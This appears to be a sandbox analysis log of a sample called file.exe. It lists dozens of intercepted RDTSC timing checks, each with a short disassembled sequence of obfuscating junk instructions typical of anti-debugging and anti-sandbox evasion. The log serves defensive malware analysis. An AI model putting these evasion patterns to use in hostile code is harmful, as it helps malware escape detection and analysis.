Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96D8E5 second address: 96D8F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnc 00007FA1ECFCB296h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96CA6C second address: 96CA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96CA70 second address: 96CA74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96CA74 second address: 96CA8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA1ED006910h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96CA8D second address: 96CA9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1ECFCB29Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96CB51 second address: 96CB5B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA1ED006906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96FA27 second address: 96FA69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007FA1ECFCB298h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 push 00000000h 0x00000023 sub dword ptr [ebp+122D1EEDh], edx 0x00000029 push 00000000h 0x0000002b or dword ptr [ebp+122D2E5Dh], ebx 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push edi 0x00000037 pop edi 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96FA69 second address: 96FA6F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96FBD3 second address: 96FBD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96FBD9 second address: 96FC64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 mov bx, 3AD4h 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007FA1ED006908h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e clc 0x0000002f mov dword ptr [ebp+122D258Eh], edi 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c jmp 00007FA1ED00690Fh 0x00000041 mov eax, dword ptr [ebp+122D0B31h] 0x00000047 mov dword ptr [ebp+122D2CF5h], edi 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push esi 0x00000052 call 00007FA1ED006908h 0x00000057 pop esi 0x00000058 mov dword ptr [esp+04h], esi 0x0000005c add dword ptr [esp+04h], 0000001Bh 0x00000064 inc esi 0x00000065 push esi 0x00000066 ret 0x00000067 pop esi 0x00000068 ret 0x00000069 mov bh, 59h 0x0000006b nop 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f pushad 0x00000070 popad 0x00000071 pushad 0x00000072 popad 0x00000073 popad 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96FC64 second address: 96FC6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96FC6A second address: 96FC6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96FC6E second address: 96FC85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FA1ECFCB29Ch 0x00000011 jnl 00007FA1ECFCB296h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96FC85 second address: 96FC8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9718D2 second address: 9718D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9718D6 second address: 971949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FA1ED00690Ah 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FA1ED006908h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 jmp 00007FA1ED006911h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007FA1ED006908h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a sub dword ptr [ebp+122D28D1h], edi 0x00000050 push eax 0x00000051 pushad 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 971949 second address: 97194F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 973EBA second address: 973EBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97B735 second address: 97B762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA1ECFCB296h 0x0000000a jmp 00007FA1ECFCB2A9h 0x0000000f pop edi 0x00000010 push edx 0x00000011 jnp 00007FA1ECFCB29Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97BB39 second address: 97BB5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FA1ED006917h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FA1ED00690Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 980A45 second address: 980A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 980B43 second address: 980B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 980C2B second address: 980C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 980C2F second address: 980C38 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 980C38 second address: 980C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 980D2E second address: 980D33 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 985E90 second address: 985E94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 985E94 second address: 985EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FA1ED00691Fh 0x0000000c jmp 00007FA1ED006919h 0x00000011 ja 00007FA1ED006912h 0x00000017 je 00007FA1ED006906h 0x0000001d je 00007FA1ED006906h 0x00000023 popad 0x00000024 pushad 0x00000025 push edi 0x00000026 jmp 00007FA1ED006910h 0x0000002b pop edi 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f pop eax 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 985291 second address: 9852C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1ECFCB2A6h 0x00000009 jnc 00007FA1ECFCB296h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007FA1ECFCB29Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98559C second address: 9855A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9855A0 second address: 9855BB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FA1ECFCB2A2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9855BB second address: 9855E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1ED00690Fh 0x00000009 pop ecx 0x0000000a pop edi 0x0000000b jg 00007FA1ED006923h 0x00000011 jmp 00007FA1ED00690Dh 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 985A69 second address: 985A6E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 985BC2 second address: 985BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98917E second address: 989199 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB2A5h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98F57C second address: 98F58F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA1ED00690Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98F58F second address: 98F5AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jl 00007FA1ECFCB296h 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007FA1ECFCB29Ch 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98F5AD second address: 98F5D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1ED006915h 0x00000009 popad 0x0000000a push ecx 0x0000000b jg 00007FA1ED006906h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98DEC0 second address: 98DED1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007FA1ECFCB296h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98DED1 second address: 98DEDB instructions: 0x00000000 rdtsc 0x00000002 js 00007FA1ED006906h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98DEDB second address: 98DEF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA1ECFCB2A3h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E1B0 second address: 98E1BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FA1ED006906h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E1BC second address: 98E1F9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FA1ECFCB29Bh 0x00000008 pop ecx 0x00000009 jne 00007FA1ECFCB2B0h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007FA1ECFCB2A8h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e jnl 00007FA1ECFCB296h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E1F9 second address: 98E1FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E1FD second address: 98E21B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA1ECFCB2A8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E34F second address: 98E356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E4D5 second address: 98E4F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA1ECFCB2A5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007FA1ECFCB2A2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E7B6 second address: 98E7C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ED00690Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E7C9 second address: 98E7DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jg 00007FA1ECFCB296h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98EA9F second address: 98EAA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98EAA3 second address: 98EAA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98EAA9 second address: 98EAB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98EAB2 second address: 98EABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98EABB second address: 98EACD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FA1ED006906h 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98EACD second address: 98EAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA1ECFCB296h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98EDFC second address: 98EE05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98EE05 second address: 98EE09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98EF7F second address: 98EF85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98EF85 second address: 98EF8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98EF8A second address: 98EF9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ED00690Dh 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93FDB1 second address: 93FDB7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93FDB7 second address: 93FDC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FA1ED006908h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 994F4B second address: 994F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 994F51 second address: 994F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 993DF3 second address: 993E14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB29Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007FA1ECFCB29Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 993E14 second address: 993E2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ED00690Bh 0x00000007 push edx 0x00000008 js 00007FA1ED006906h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 993E2A second address: 993E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FA1ECFCB2A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9945BE second address: 9945C3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9945C3 second address: 9945E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA1ECFCB2A9h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9945E3 second address: 9945E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 994779 second address: 994791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 jmp 00007FA1ECFCB29Dh 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99928F second address: 999297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 999297 second address: 9992A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1ECFCB29Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9992A7 second address: 9992AD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9552C1 second address: 7AEA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 jmp 00007FA1ECFCB29Fh 0x0000000d push dword ptr [ebp+122D0491h] 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FA1ECFCB298h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d xor dword ptr [ebp+122D291Eh], edx 0x00000033 push ebx 0x00000034 call 00007FA1ECFCB29Eh 0x00000039 mov di, 31E6h 0x0000003d pop edx 0x0000003e pop edi 0x0000003f call dword ptr [ebp+122D34CFh] 0x00000045 pushad 0x00000046 jnc 00007FA1ECFCB2ACh 0x0000004c xor eax, eax 0x0000004e sub dword ptr [ebp+122D3052h], esi 0x00000054 mov edx, dword ptr [esp+28h] 0x00000058 mov dword ptr [ebp+122D3052h], eax 0x0000005e mov dword ptr [ebp+122D38FBh], eax 0x00000064 mov dword ptr [ebp+122D3052h], ecx 0x0000006a mov esi, 0000003Ch 0x0000006f jg 00007FA1ECFCB29Ch 0x00000075 add esi, dword ptr [esp+24h] 0x00000079 jg 00007FA1ECFCB2ABh 0x0000007f lodsw 0x00000081 cmc 0x00000082 add eax, dword ptr [esp+24h] 0x00000086 stc 0x00000087 mov ebx, dword ptr [esp+24h] 0x0000008b cmc 0x0000008c nop 0x0000008d pushad 0x0000008e pushad 0x0000008f jbe 00007FA1ECFCB296h 0x00000095 push eax 0x00000096 push edx 0x00000097 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 955458 second address: 95545D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95545D second address: 9554B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA1ECFCB296h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 40607A8Fh 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007FA1ECFCB298h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e push 7616ECC0h 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FA1ECFCB2A4h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9554B3 second address: 9554B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9554B9 second address: 9554D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1ECFCB2A4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95557D second address: 955590 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ED00690Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9556CF second address: 9556D9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA1ECFCB296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9557A9 second address: 9557AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 955EA5 second address: 955EB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95609B second address: 9560C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FA1ED00690Dh 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 jp 00007FA1ED006906h 0x0000001d pop ecx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9560C1 second address: 9560DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1ECFCB2A9h 0x00000009 rdtsc
